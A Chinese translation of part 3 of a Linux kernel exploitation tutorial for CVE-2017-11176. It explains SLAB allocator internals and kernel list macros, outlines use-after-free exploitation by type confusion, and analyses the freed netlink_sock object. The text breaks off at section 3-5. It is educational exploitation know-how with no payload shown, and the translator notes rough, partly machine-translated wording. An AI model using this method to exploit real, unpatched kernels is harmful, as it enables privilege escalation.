CVE-2017-11176: A step-by-step Linux Kernel exploitation (part 3/4)

这是第三部分的剩余部分的翻译，英语比较烂，很粗糙，建议结合原文一起看。
原文连接：https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html

介绍

在前面的文章中，我们对在用户空间触发bug进行了概念性的验证，删除了第一部分中用System Tap的修改。

这个文章从介绍内存子系统和SLAB分配器开始。如此庞大的一个主题，我们强烈建议读者用一些额外的资源来了解它。了解他们对利用所有的UAF漏洞或者说对溢出漏洞是绝对必要的。

我们会介绍基础的UAF原理，像利用他们所需的信息收集步骤。下一步，我们将会尝试在bug上应用它，然后分析可用的不同指令。
根据我们的再分配战略，我们打算使用把UAF转化成任意调用指令。最后，内核将会在一个受控的状态下惊慌（不会再有随机的crash）。

我们这儿用的技术是一个常用的在内核中利用UAF漏洞的技术（类型混淆）。此外，我们还选择了任意调用来利用UAF。因为硬编码，exp不会是任意情况都适用的，无法绕过KASLR（地址空见随机化的内核版本）。

注意同样的bug可以被其他不同的方式利用来获取其他操作（任意读/写），绕过kaslr/smap/smep（我们将会绕过smep在part4）。我们现在有概念验证代码，可以实际的创造一个exp。

作为补充，内核exp跑在一个非常混乱的环境中。它在前面的文章中不是问题，现在是了（再分配）。即，如果这儿有一个地方会让我们的exp失败（因为我们还没跑过），那么大多数时候不是意外。可靠的再分配是开放领域的主题，更多的复杂技巧在这个文章中不合适。

最后，以为内核数据结构布局现在很重要，调试/开发内核有很多不同，我们将会和system tap说再见，这意味着我们将会适用更传统的工具来调试内核。此外，你的结构布局将会和我们的不同，这儿提供的exp如果不修改不会在你的系统下有效果。

准备好去crash（很多次），这是一个快乐的开始:-)。

1.核心内容

第三部分的“核心内容”节尝试去介绍内存子系统（也被叫做“mm”）。这是一个很广阔的内容，书本仅仅只覆盖了内核的一小部分，推荐去阅读下面的一些资料。尽管如此，它将会提供linux内核的核心数据结构来管理内存，这样我们就能达成一致了（一语双关）。

Understanding the Linux Kernel (chapters 2,8,9)
Understanding The
Linux Virtual Memory Manager Linux Device Driver: Allocating Memory
OSDev: Paging

在核心内容节的最后，我们会介绍 container_of()宏，然后提供一个linux双向循环链表的通用利用方法。一个基本的例子会被用来理解list_for_each_entry_safe() 宏（强制使用）。

ps：可能会用到的宏，我先写在这儿
offsetof宏：判断结构体中成员的偏移位置
container_of宏：根据成员的地址反过来来获取结构体地址。
list_for_each_entry_safe()：相当于遍历整个双向循环链表，遍历时会存下下一个节点的数据结构，方便对当前项进行删除。

1-1 物理页管理

所有操作系统中最重要的作业之一就是内存管理。它必须要快，安全，最小化碎片。不幸的是，大多数这些目标都是互斥的（安全就意味着性能差）。因为效率原因，物理内存把相邻的内存分为固定长度块。这个块叫做一个页框，有一个固定的4096位大小。它可以用PAGE_SIZE 宏检索到。

因为内核必须控制内存。所以它保持着每一个物理页框的追踪像他们的信息。举个例子，他们必须知道特定的页面是不是可用的，这些信息被记录在页面数据结构struct page（也被叫做页面描述符）。

内核可以用alloc_pages()申请一个或者多个相邻的页面，用free_pages()来释放他们。分区页框分配器用来管理内核的这些请求，通常使用的伙伴系统算法。所以也被叫做伙伴伙伴分配器。

1-2 slab分配器

伙伴分配器提供的大小不是所有情况都适用的。举个例子，如果内核只想要128位内存空间，它可能申请了一页，但是3968位内存将会被浪费。着叫做内部碎片。为了克服这个情况，linux提供了一个更小的分配器：Slab分配器。为了让它简单起见，在内核里Slab分配器负责类似malloc()/free()等函数的功能。

内核提供了三种slab分配器（只使用一个）：

SLAB分配器：历史分配器，专注于硬件缓存优化(Debian仍然使用它)。
SLUB分配器：自2007年以来的“新”标准分配器（由Ubuntu / CentOS / Android使用）。
SLOB分配器：用于嵌入式系统的小内存。

NOTE：我们将会适用下面的命名规则：Slab是一个Slab分配器（它可以是SLAB，SLUB，SLOB）。SLAB（资本）是三个分配器中的一个。一个slab（小写）是一个Slab分配器适用的对象。

我们这里无法介绍所有的Slab分配器。我们的目标使用的SLAB 分配器有大量的完整文档说明可以查询。SLUB分配器似乎时最好理解的，没有用缓存着色，不追踪"full slab"，没有内部和外部的slab管理等等。用下面的代码可以查看机器使用的Slab分配器。
grep “CONFIG_SL.B=” /boot/config-$(uname -r)

重新分配内存取决于Slab分配器，与SLUB相比，在SLAB上利用“use-after-free”更容易。换句话说，利用SLAB还有一个好处就是slab混淆（更多的对象被存在"general" kmemcaches）。
ps: kmemcache是memcache的linux内核移植版,具体的请看https://blog.csdn.net/hjxhjh/article/details/12000413

1-3 cache和slab

由于内核偏向于分配相同内存大小的对象，所有为了避免反复申请释放同一块内存，Slab分配器把相同大小的对象放在cache（一个已分配页框架的池）里面，cache用到的结构体时struct kmem_cache（缓存描述符）。

struct kmem_cache {// ...unsigned int        num;              // 每个slab中的对象数量unsigned int        gfporder;         // 一个slab对象包含连续页是2的几次方const char          *name;            // 这个cache的名字int                 obj_size;         // 管理的对象的大小struct kmem_list3   **nodelists;      // 维护三个链表empty/partial/full slabsstruct array_cache  *array[NR_CPUS];  // 每个cpu中空闲对象组成的数组
};

一个slab基本上是一个或者多个页。一个简单的slab持有num数量的对象，每个对象大小都是obj_size，例如一个页大小的slab可以有四个1kb的对象。

slab的状况是被 struct slab(slab管理结构)描述的。

struct slab {struct list_head list;          // 用于将slab链入kmem_list3的链表unsigned long colouroff;       // 该slab的着色偏移void *s_mem;                   // 指向slab中的第一个对象unsigned int inuse;             // 已经分配对象的数量kmem_bufctl_t free;             // 下一个未分配对象的下标unsigned short nodeid;            // 节点标识号
};

slab的数据结构对象（slab描述符）可以被存在slab内部或者另一个内存的位置。这样做的根本原因是减少外碎片。slab的数据结构对象具体别存在哪取决于缓存对象的大小，如果当前的对象大小小于512字节，那么会存在slab内部，否则会存在slab外部。

NOTE： internal/external stuff不需要被担心，我们在利用use-after-free。在另一方面，如果你要利用堆溢出，理解这个很有必要。

检索slab中对象的虚拟地址，可以直接通过s_mem(第一个对象的地址)加上偏移量获得。为了让他变得简单，所以第一个对象得地址就是s_mem，第二个就是s_mem + obj_size等等。其实上比这个更复杂，因为有"colouring" stuff （缓存着色相关的？不怎么理解），但是这个是题外话。

1-4 slabs内部管理和伙伴系统作用

当一个slab被创建的时候，Slab分配器向伙伴分配器申请物理页，当然，当他被销毁的时候，会把物理页面还给伙伴分配器。内存会降低slab的创建和销毁以提高效率。
NOTE：为什么gfporder (struct kmem_cache)是同一个slab相邻页面的对数，这是因为伙伴系统不用byte来分配大小，而是以2的几次幂来分配的。gfporder 为0，表示单页，为1表示相邻的两页，为2表示相邻的四页。

对于每一个cache，会保持三个双链表结构为了slabs。

full slabs：当前slab中的所有对象都被使用了。
free slabs：当前slab中的所有对象都是空的。 partial
slabs：当前slab中的部分对象被使用了。

这些页面被存储与描述符中，nodelists(struct kmem_cache)，每个slab属于三个列表中的一个，并且能在自身情况改变后，在三个列表中进行切换。

为了减少与伙伴分配器的交互，SLAB分配器会保留一个有少量free slabs和partial slabs的池。当Slab分配器申请一个对象的时候，会先检索自己的池中是否有空闲的slab，如果没有就会调用cache_grow()方法向伙伴分配器申请更多的物理页，当然，如果Slab分配器发现自己的池中有太多的空闲slab，也会销毁一些slab将我i里也还给伙伴分配器。

1-5 每个cpu中的缓存数组

每次申请，Slab分配器需要扫描整个free slabs 或者 partial slabs。通过扫描整个列表来寻找空闲的空间是低效的。（这会要求一些锁，还需要去找偏移）

为了提高性能，Slab分配器保存一个队列指向空的对象。即struct array_cache，保存在缓存描述符中（struct kmem_cache）。

struct array_cache {unsigned int avail;       // 存放可用对象指针的数量也是当前空闲空闲数组的下标unsigned int limit;       // 最多可以存放的对象指针数量unsigned int batchcount;unsigned int touched;spinlock_t lock;void *entry[];            //  对象指针数组
};

ps：貌似最近的版本中entry[]变成了entry[0]，entry[0]表示一个可变长度的数组。
array_cache 采用的是LIFO的数据结构，从漏洞利用者的角度来说，这是一个极好的方式，这也是为什么在SLAB和SLUB分配器下use-after-free是更容易利用。
最简单的申请内存：

static inline void *____cache_alloc(struct kmem_cache *cachep, gfp_t flags) // yes... four "_"
{void *objp;struct array_cache *ac;ac = cpu_cache_get(cachep);if (likely(ac->avail)) {STATS_INC_ALLOCHIT(cachep);ac->touched = 1;objp = ac->entry[--ac->avail];        // <-----}// ... cut ...return objp;
}

最简单的释放内存：

static inline void __cache_free(struct kmem_cache *cachep, void *objp)
{struct array_cache *ac = cpu_cache_get(cachep);// ... cut ...if (likely(ac->avail < ac->limit)) {STATS_INC_FREEHIT(cachep);ac->entry[ac->avail++] = objp;          // <-----return;}
}

简单来说，最好的情况下，申请和释放操作的复杂度只有O(1)。

WARNING：如果这个快捷的方式失败了，分配算法会回到慢的解决方案，即一个个遍历。

NOTE：每个cpu都有一个数组缓存，可以用cpu_cache_get()方法来获取，如此做可以减少锁的次数，从而提高性能。

NOTE：array cache中的每一个空闲的指针可能指向的是不容的slabs

1-6 通用和专用缓存

为了减少外碎片，内核创建缓存以2的次方的大小，这样确保内碎片小于50%的大小，事实上，当内核去申请指定大小的尺寸时，他会申请到最适合的内存大小，即申请100字节会给你128字节的内存空间。

在SLAB中，通用缓存会有前缀"size-"（size-32,size-64）。在SLUB中，通用缓存会有前缀"kmalloc-"（kmalloc-32）。由于我们觉得SLUB的前缀更好，所以我们通常用他哪怕我们的目标是SLAB。

内核使用kmalloc()和kfree()方法去申请和释放通用缓存。

因为有一些对象会被频繁的申请和释放，内核创建了一些特殊的专用缓存。例如file文件对象是非常常用的对象，他有自己的专用缓存(filp)。这些专用缓存的内碎片会接近于0。

内核使用kmem_cache_alloc()和kmem_cache_free()方法去申请和释放一块专用的内存空间。

在最后kmalloc()和kmem_cache_alloc()会变成 __cache_alloc()函数，当然kfree()和kmem_cache_free()会变成__cache_free()函数。

NOTE：你可以看到全部的cache清单和一些有用的信息，在/proc/slabinfo中。

1-7 container_of()宏

container_of()宏在linux内核的所有地方都被用到了。


#define container_of(ptr, type, member) ({          \const typeof( ((type *)0)->member ) *__mptr = (ptr);    \(type *)( (char *)__mptr - offsetof(type,member) );})//ptr 当前的地址
//type 所涉及的数据结构
//member 数据结构中的成员名

container_of()宏的意义在于利用结构成员的地址找回结构本身的地址。他使用两个宏：

typeof() - 定义编译时的类型
offsetof() - 查找结构中字段的偏移地址（以字节为单位）

也就是说，他利用他自己的当前段的地址减去他在该结构中的偏移地址。

1-8 使用双向循环列表

linux内核中广泛的使用到了双向循环列表，理解他对我们达到任意命令执行很必要，接下来我们会用一个具体的例子来理解双向循环列表的使用。这节结束时，你会明白list_for_each_entry_safe()宏的作用。

linux用以下结构处理双向循环列表：

struct list_head {struct list_head *next, *prev;
};

这个结构有两个作用：

代表双向循环列表本身。
代表列表中的一个元素。

INIT_LIST_HEAD()函数被用来创建双向循环列表，并将其next和prev指针都指向列表本身。

static inline void INIT_LIST_HEAD(struct list_head *list)
{list->next = list;list->prev = list;
}

我们先定义一个resource_owner结构体

struct resource_owner
{char name[16];struct list_head consumer_list;
};
void init_resource_owner(struct resource_owner *ro)
{strncpy(ro->name, "MYRESOURCE", 16);INIT_LIST_HEAD(&ro->consumer_list);
}

为了使用列表，每个列表成员的结构必须一致，即每个成员都必须有struct list_head字段。

struct resource_consumer
{int id;struct list_head list_elt;    // <----- this is NOT a pointer
};

成员可以被添加和删除通过list_add()和list_del()方法。

int add_consumer(struct resource_owner *ro, int id)
{struct resource_consumer *rc;if ((rc = kmalloc(sizeof(*rc), GFP_KERNEL)) == NULL)return -ENOMEM;rc->id = id;list_add(&rc->list_elt, &ro->consumer_list);return 0;
}

接下来，我们想要释放一个成员，但是这个列表中只有一个元素，所以我们可以直接用container_of()宏来辅助释放当前元素。因为我们需要释放整一个resource_consumer对象，但是列表中只有list_elt的地址，所以需要把列表中的list_elt地址取出来，用container_of()宏来取到resource_consumer的地址，然后调用kfree()。

void release_consumer_by_entry(struct list_head *consumer_entry)
{struct resource_consumer *rc;// "consumer_entry" points to the "list_elt" field of a "struct resource_consumer"rc = container_of(consumer_entry, struct resource_consumer, list_elt);list_del(&rc->list_elt);kfree(rc);
}

我们想要访问一个元素通过他的id，所以我们使用list_for_each()宏遍历列表。

#define list_for_each(pos, head) \for (pos = (head)->next; pos != (head); pos = pos->next)
//如果pos指针没有指到头节点，就继续往下。
#define list_entry(ptr, type, member) \container_of(ptr, type, member)

我们可以看到list_for_each()只提供了一个迭代器，所以我们仍然需要container_of()宏，但是一般用list_entry()宏，因为虽然功能一样，但是名字更好。

struct resource_consumer* find_consumer_by_id(struct resource_owner *ro, int id)
{struct resource_consumer *rc = NULL;struct list_head *pos = NULL;list_for_each(pos, &ro->consumer_list) {rc = list_entry(pos, struct resource_consumer, list_elt);if (rc->id == id)return rc;}return NULL; // not found
}

不得不申明list_head变量，使用list_entry()/container_of()宏有点复杂，所以出现了list_for_each_entry()宏(使用了list_first_entry() 和 list_next_entry()宏)

#define list_first_entry(ptr, type, member) \list_entry((ptr)->next, type, member)
//取出下一个指针的结构体本身的地址
#define list_next_entry(pos, member) \list_entry((pos)->member.next, typeof(*(pos)), member)
//取出结构体中的取出当前元素所在元素链表中的下一个，然后返回下一个元素的结构的指针
#define list_for_each_entry(pos, head, member)              \for (pos = list_first_entry(head, typeof(*pos), member);    \&pos->member != (head);                    \pos = list_next_entry(pos, member))
//c=typeof(*pos) 可以把c指向pos的数据类型

我们重写之前的代码，不再申明struct list_head。

struct resource_consumer* find_consumer_by_id(struct resource_owner *ro, int id)
{struct resource_consumer *rc = NULL;list_for_each_entry(rc, &ro->consumer_list, list_elt) {if (rc->id == id)return rc;}return NULL; // not found
}

接下来，如果我们要释放每一个成员，就会遇到两个问题：
我们release_consumer_by_entry()函数写的很烂，因为需要一个struct list_head指针。
list_for_each()宏是基于列表不变的基础上的。

我们无法再遍历列表时删除元素，这会让我们的use-after-free很难进行，所以我们使用 list_for_each_safe()宏来解决，他会预先读取下一个元素。

#define list_for_each_safe(pos, n, head) \for (pos = (head)->next, n = pos->next; pos != (head); \pos = n, n = pos->next)

这意味着我们需要两个struct list_head变量。

void release_all_consumers(struct resource_owner *ro)
{struct list_head *pos, *next;list_for_each_safe(pos, next, &ro->consumer_list) {release_consumer_by_entry(pos);}
}

最后一个是因为release_consumer_by_entry()写的很烂，所以我们我们用一个struct resource_consumer 指针作为参数。（不再使用container_of()）

void release_consumer(struct resource_consumer *rc)
{if (rc){list_del(&rc->list_elt);kfree(rc);}
}

由于我们不用再使用struct list_head作为参数，所以利用 list_for_each_entry_safe()宏重写release_all_consumers()函数

#define list_for_each_entry_safe(pos, n, head, member)          \for (pos = list_first_entry(head, typeof(*pos), member),    \n = list_next_entry(pos, member);           \&pos->member != (head);                    \pos = n, n = list_next_entry(n, member))

即：

void release_all_consumers(struct resource_owner *ro)
{struct resource_consumer *rc, *next;list_for_each_entry_safe(rc, next, &ro->consumer_list, list_elt) {release_consumer(rc);}
}

list_for_each_entry_safe()宏在很多方面都用到了，包括
我们去实现任意命令执行。我们甚至会在汇编中查看他（因为偏移量）。

2.use-after_free 101

这一小节将会讲解use-after-free的基本原理，包括一些使用的必要条件和最普遍的使用方法。

2-1 模式

这个漏洞的名字解释了所有的事，一个简单的例子：

int *ptr = (int*) malloc(sizeof(int));
*ptr = 54;
free(ptr);
*ptr = 42; // <----- use-after-free

这个bug产生的原因主要事没有人知道在在调用free(ptr)后，指针ptr指向内存中的什么。她被叫做悬空指针，读和写的操作事一个未定义的行为，在最好的情况下，他只是一个空操作，在最坏的情况下，他会让一个应用程序（或者内核）直接crash。

2-2 信息收集

将use-after-free用在内核中通常用的事相同的方案，在尝试去做之前，必须先回答以下几个问题：

分配器是什么，他怎么工作的？
我们在讨论的对象是什么？
他属于哪一个cache？其中的对象大小？是专用的cache还是普通的？
他在哪里申请和释放？
他在哪个位置有了free后进行了使用？做了什么（读/写）？

为了回答这些问题，谷歌的开发人员开发了一个很好的linux补丁：KASAN (Kernel Address SANitizer)。一个典型的输出是:

==================================================================
BUG: KASAN: use-after-free in debug_spin_unlock                             // <--- the "where"
kernel/locking/spinlock_debug.c:97 [inline]
BUG: KASAN: use-after-free in do_raw_spin_unlock+0x2ea/0x320
kernel/locking/spinlock_debug.c:134
Read of size 4 at addr ffff88014158a564 by task kworker/1:1/5712            // <--- the "how"CPU: 1 PID: 5712 Comm: kworker/1:1 Not tainted 4.11.0-rc3-next-20170324+ #1
Hardware name: Google Google Compute Engine/Google Compute Engine,
BIOS Google 01/01/2011
Workqueue: events_power_efficient process_srcu
Call Trace:                                                                 // <--- call trace that reach it__dump_stack lib/dump_stack.c:16 [inline] dump_stack+0x2fb/0x40f lib/dump_stack.c:52 print_address_description+0x7f/0x260 mm/kasan/report.c:250 kasan_report_error mm/kasan/report.c:349 [inline] kasan_report.part.3+0x21f/0x310 mm/kasan/report.c:372 kasan_report mm/kasan/report.c:392 [inline] __asan_report_load4_noabort+0x29/0x30 mm/kasan/report.c:392 debug_spin_unlock kernel/locking/spinlock_debug.c:97 [inline] do_raw_spin_unlock+0x2ea/0x320 kernel/locking/spinlock_debug.c:134 __raw_spin_unlock_irq include/linux/spinlock_api_smp.h:167 [inline] _raw_spin_unlock_irq+0x22/0x70 kernel/locking/spinlock.c:199 spin_unlock_irq include/linux/spinlock.h:349 [inline] srcu_reschedule+0x1a1/0x260 kernel/rcu/srcu.c:582 process_srcu+0x63c/0x11c0 kernel/rcu/srcu.c:600 process_one_work+0xac0/0x1b00 kernel/workqueue.c:2097 worker_thread+0x1b4/0x1300 kernel/workqueue.c:2231 kthread+0x36c/0x440 kernel/kthread.c:231 ret_from_fork+0x31/0x40 arch/x86/entry/entry_64.S:430 Allocated by task 20961:                                                      // <--- where is it allocatedsave_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59 save_stack+0x43/0xd0 mm/kasan/kasan.c:515 set_track mm/kasan/kasan.c:527 [inline] kasan_kmalloc+0xaa/0xd0 mm/kasan/kasan.c:619 kmem_cache_alloc_trace+0x10b/0x670 mm/slab.c:3635 kmalloc include/linux/slab.h:492 [inline] kzalloc include/linux/slab.h:665 [inline] kvm_arch_alloc_vm include/linux/kvm_host.h:773 [inline] kvm_create_vm arch/x86/kvm/../../../virt/kvm/kvm_main.c:610 [inline] kvm_dev_ioctl_create_vm arch/x86/kvm/../../../virt/kvm/kvm_main.c:3161 [inline] kvm_dev_ioctl+0x1bf/0x1460 arch/x86/kvm/../../../virt/kvm/kvm_main.c:3205 vfs_ioctl fs/ioctl.c:45 [inline] do_vfs_ioctl+0x1bf/0x1780 fs/ioctl.c:685 SYSC_ioctl fs/ioctl.c:700 [inline] SyS_ioctl+0x8f/0xc0 fs/ioctl.c:691 entry_SYSCALL_64_fastpath+0x1f/0xbe Freed by task 20960:                                                          // <--- where it has been freedsave_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59 save_stack+0x43/0xd0 mm/kasan/kasan.c:515 set_track mm/kasan/kasan.c:527 [inline] kasan_slab_free+0x6e/0xc0 mm/kasan/kasan.c:592 __cache_free mm/slab.c:3511 [inline] kfree+0xd3/0x250 mm/slab.c:3828 kvm_arch_free_vm include/linux/kvm_host.h:778 [inline] kvm_destroy_vm arch/x86/kvm/../../../virt/kvm/kvm_main.c:732 [inline] kvm_put_kvm+0x709/0x9a0 arch/x86/kvm/../../../virt/kvm/kvm_main.c:747 kvm_vm_release+0x42/0x50 arch/x86/kvm/../../../virt/kvm/kvm_main.c:758 __fput+0x332/0x800 fs/file_table.c:209 ____fput+0x15/0x20 fs/file_table.c:245 task_work_run+0x197/0x260 kernel/task_work.c:116 exit_task_work include/linux/task_work.h:21 [inline] do_exit+0x1a53/0x27c0 kernel/exit.c:878 do_group_exit+0x149/0x420 kernel/exit.c:982 get_signal+0x7d8/0x1820 kernel/signal.c:2318 do_signal+0xd2/0x2190 arch/x86/kernel/signal.c:808 exit_to_usermode_loop+0x21c/0x2d0 arch/x86/entry/common.c:157 prepare_exit_to_usermode arch/x86/entry/common.c:194 [inline] syscall_return_slowpath+0x4d3/0x570 arch/x86/entry/common.c:263 entry_SYSCALL_64_fastpath+0xbc/0xbe The buggy address belongs to the object at ffff880141581640 which belongs to the cache kmalloc-65536 of size 65536                         // <---- the object's cache
The buggy address is located 36644 bytes inside of 65536-byte region [ffff880141581640, ffff880141591640)
The buggy address belongs to the page:                                          // <---- even more info
page:ffffea000464b400 count:1 mapcount:0 mapping:ffff880141581640
index:0x0 compound_mapcount: 0
flags: 0x200000000008100(slab|head)
raw: 0200000000008100 ffff880141581640 0000000000000000 0000000100000001
raw: ffffea00064b1f20 ffffea000640fa20 ffff8801db800d00
page dumped because: kasan: bad access detected Memory state around the buggy address: ffff88014158a400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff88014158a480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
>ffff88014158a500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff88014158a580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff88014158a600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================

NOTE：之前的错误报告是从syzkaller这个程序来的，另一个很好的工具。

不幸的是，你可能无法在你的环境下安装KASAN。据我们所知，KASAN要求最小的内核版本是4.x而且不支持所有架构的linux。既然这样，我们只能手动来做这个工作。

补充一下，KASAN只是展示use-after-free发生在哪。实际操作时，这儿会有更多的悬空指针（后面会讲到）。识别他们需要更多的代码审计。

2-3 通过类型混淆来利用use-after-free：

这儿有很多种方法去利用一个use-after-free的漏洞。例如，有一种时使用分配器元数据（allocator meta-data，不怎么懂这个什么意思）。在内核中用这个方法会有一点困难，他也增加了你在利用完漏洞后修复内核的难度。修复将会在part 4讲解，这步不能跳过，不然内核会在你利用结束后crash。

类型混淆是一个内核利用use-after-free的常用方法。类型混淆通常出现在内核误解一个数据的类型时。他使用一个数据（通常是指针）他以为是一种类型，但是他真正指向的是另一个数据类型。因为他发生在C语言，类型检查时在编译时完成的。cpu实际上不关心地址，他只是取消引用固定偏移的地址。

用类型混淆利用UAF漏洞基本的步骤是：

让内核处于一个合适的状态（让一个套接字准备去阻塞）
在确保悬空指针不受影响的同时释放目标对象，触发bug
立刻重新分配到你可以控制数据的对象
从悬空指针触发UAF
ring0接管
修复内核和清空所有东西
享受这个过程

如果你制作一个恰当的exp，那么只有第三步会真正意义上的失败。我们可以看看为什么。

WARNING：用类型混淆触发的UAF的目标对象必须是通用缓存（cache）。如果不是这样也有办法处理，但是有一点高级，这里不讲了。

3.分析UAF（cache、allocation、free）

在这一节中我们会回答信息收集那一节中的问题

3-1 分配器是什么，他怎么工作的？

分配器是什么，他怎么工作的？

在我们的目标中，分配器是SLAB分配器。正如上面核心概念中谈到的一样，我们可以从内核配置文件中收集信息。另一个方法在/proc/slabinfo中是检查通用cache的名字。他们都有“size-”或者“kmalloc-”的前缀？

我们可以更好了解他的数据结构，特别是array_cache

NOTE：如果你之前没有掌握你的分配器（特别是 kmalloc()/kfree()的编程规范），现在是个很好的学习时间。

这个下面是我自己补充的一部分函数说明：
kmalloc：

kmalloc：
void *kmalloc(size_t size, gfp_t flags)；第一个参数是要分配的块的大小，第二个参数是分配标志（flags），他提供了多种kmalloc的行为。
kmalloc() 申请的内存位于物理内存映射区域，而且在物理上也是连续的，它们与真实的物理地址只有一个固定的偏移，因为存在较简单的转换关系，所以对申请的内存大小有限制，不能超过128KB。
较常用的 flags（分配内存的方法）：
GFP_ATOMIC —— 分配内存的过程是一个原子过程，分配内存的过程不会被（高优先级进程或中断）打断；
GFP_KERNEL —— 正常分配内存；
GFP_DMA —— 给 DMA 控制器分配内存，需要使用该标志（DMA要求分配虚拟地址和物理地址连续）

kfree：

kfree：
void kfree(const void *objp);

kzalloc()：

kzalloc()：*kzalloc(size_t size, gfp_t flags){    return kmalloc(size, flags | __GFP_ZERO);}
kzalloc() 函数与 kmalloc() 非常相似，参数及返回值是一样的，可以说是前者是后者的一个变种，因为 kzalloc() 实际上只是额外附加了 __GFP_ZERO 标志。所以它除了申请内核内存外，还会对申请到的内存内容清零。
kzalloc() 对应的内存释放函数也是 kfree()。

vmalloc()：

vmalloc()：
void *vmalloc(unsigned long size);vmalloc() 函数则会在虚拟内存空间给出一块连续的内存区，但这片连续的虚拟内存在物理内存中并不一定连续。由于 vmalloc() 没有保证申请到的是连续的物理内存，因此对申请的内存大小没有限制，如果需要申请较大的内存空间就需要用此函数了
对应的内存释放函数为：
void vfree(const void *addr);

注意：vmalloc() 和 vfree() 可以睡眠，因此不能从中断上下文调用。

3-2 我们在讨论的对象是什么？

这个在前两节已经被讨论的很清楚了，我们UAF的对象就是struct netlink_sock。他又很清晰的定义：

struct netlink_sock {/* struct sock has to be the first member of netlink_sock */struct sock     sk;u32         pid;u32         dst_pid;u32         dst_group;u32         flags;u32         subscriptions;u32         ngroups;unsigned long       *groups;unsigned long       state;wait_queue_head_t   wait;struct netlink_callback *cb;struct mutex        *cb_mutex;struct mutex        cb_def_mutex;void            (*netlink_rcv)(struct sk_buff *skb);struct module       *module;
};

这个在我们的例子里面很明显。有时，可能需要花一会儿去计算出UAF的对象。特别是，当一个特定的对象有各种子对象的所有权（他掌握他们的生命周期）。UAF可能会依赖于其中的一个子对象（不是最重要的一个）。

3-3 他在哪里释放：

在第一部分中，我们看到the netlink’s sock的计数器被置为1在进入entering mq_notify()的时候。参考计数器通过netlink_getsockbyfilp()来增加一，通过netlink_attachskb()来减少一，在另一时间又通过netlink_detachskb()来减少一。给我们以下的路径：

- mq_notify
- netlink_detachskb
- sock_put          // <----- atomic_dec_and_test(&sk->sk_refcnt)和sk_free()

因为计数器清零了，所以他被sk_free()释放了：

void sk_free(struct sock *sk)
{/** We subtract one from sk_wmem_alloc and can know if* some packets are still in some tx queue.* If not null, sock_wfree() will call __sk_free(sk) later*/if (atomic_dec_and_test(&sk->sk_wmem_alloc))__sk_free(sk);
}

记住sk->sk_wmem_alloc是当前的发送缓存区。当整个netlink_sock初始化期间，这被设置为1。因为我们没有从目标套接字发送任何消息，在进入sk_free()时，他依然是1。在这里，他被叫做_sk_free()：

      // [net/core/sock.c]static void __sk_free(struct sock *sk){struct sk_filter *filter;[0]     if (sk->sk_destruct)sk->sk_destruct(sk);// ... cut ...[1]     sk_prot_free(sk->sk_prot_creator, sk);}
注意这里面的sk_prot_creator是基于虚函数表proto_ops来实现的

在[0]中，__sk_free()给了sock调用“专门”析构函数的机会。在[1]中，他用struct proto数据类型的sk_prot_create()来调用sk_prot_free()（不懂这句话？谷歌是这么翻译的。。。），最后这个对象根据cache来释放（下一节）。

static void sk_prot_free(struct proto *prot, struct sock *sk)
{struct kmem_cache *slab;struct module *owner;owner = prot->owner;slab = prot->slab;security_sk_free(sk);if (slab != NULL)kmem_cache_free(slab, sk);    // <----- this one or...elsekfree(sk);                    // <----- ...this one ?module_put(owner);
}
这个函数主要是把sock所在的cache整个释放掉了。

这是最后的释放过程：

- <<< what ever calls sock_put() on a netlink_sock (e.g. netlink_detachskb()) >>>
- sock_put
- sk_free
- __sk_free
- sk_prot_free
- kmem_cache_free or kfree

NOTE：记住所有的sk和netlink_sock的地址别名。即释放struct sock指针将会释放整个netlink_sock对象。

我们需要分析他最后一个调用的函数。因此，我们需要知道他属于哪个cache。

3-4 他属于哪一个cache呢？

记住linux是一个非常抽象的面向对象的操作系统。我们已经看到了多层次的抽象概念，也因此而很专业（查看核心概念部分就可得知）。

struct proto提供了另一个抽象的层次，我们有：

socket的文件类型（struct file）专用：socket_file_ops
netlink的BSD套接字 (struct socket) 专用：netlink_ops
netlink的sock（struct sock）专用：netlink_proto 和 netlink_family_ops

NOTE：我们下一节会回到netlink_family_ops

不像是socket_file_ops和netlink_ops都仅仅是VFT（虚函数表），struct proto是更复杂的。他当然维持一个VFT，但是他也提供了一些信息关于struct sock的生命周期。特别是一个特殊的sock对象是专门被分配的。

就我们的例子而言，最重要的两个字段是slab和obj_size：

// [include/net/sock.h]struct proto {struct kmem_cache *slab;      // the "dedicated" cache (if any)unsigned int obj_size;        // the "specialized" sock object sizestruct module *owner;         // used for Linux module's refcountingchar name[32];// ...
}

对于netlink_sock对象，struct proto是netlink_proto

static struct proto netlink_proto = {.name     = "NETLINK",.owner    = THIS_MODULE,.obj_size = sizeof(struct netlink_sock),
};

这个obj_size不是最后的申请的大小，只是他的一部分（下一节会讲到）。

正如我们所看到的大量的字段是留空的（null）。这是不是表明netlink_proto没有一个专门的cache？我们无法准确的判定因为slab字段只有在协议注册的时候才定义。我们不会细讲协议注册的内容，但是我们需要了解一些。

在linux中，network模块要么是在开机的时候装载，要么是懒加载的（第一次有一个专门的soclet被使用）。两种情况下，init()函数都会被调用，在netlink的例子中，这个函数被叫做netlink_proto_init()。他至少被调用两次：

调用proto_register(&netlink_proto, 0)
调用sock_register(&netlink_family_ops)

proto_register()表明这个协议是否使用一个专门的cache。如果是的，他创造一个专门的kmem_cache，不然他会使用一个通常意义的caches。这个决定alloc_slab的范围（第二点）。实现：

// [net/core/sock.c]int proto_register(struct proto *prot, int alloc_slab)
{if (alloc_slab) {prot->slab = kmem_cache_create(prot->name,            // <----- creates a kmem_cache named "prot->name"sk_alloc_size(prot->obj_size), 0,         // <----- uses the "prot->obj_size"SLAB_HWCACHE_ALIGN | proto_slab_flags(prot),NULL);if (prot->slab == NULL) {printk(KERN_CRIT "%s: Can't create sock SLAB cache!\n",prot->name);goto out;}// ... cut (allocates other things) ...}// ... cut (register in the proto_list) ...return 0;// ... cut (error handling) ...
}

这儿是唯一可以协议是否能有专门的cache的地方。因此，netlink_proto_init()在调用proto_register()时alloc_slab是0，netlink协议使用的是一个通用的cache。正如你所猜想的，问题中的通用cache将会决定proto的obj_size字段。我们会在下一节看到的。

3-5 他是在哪里分配的？

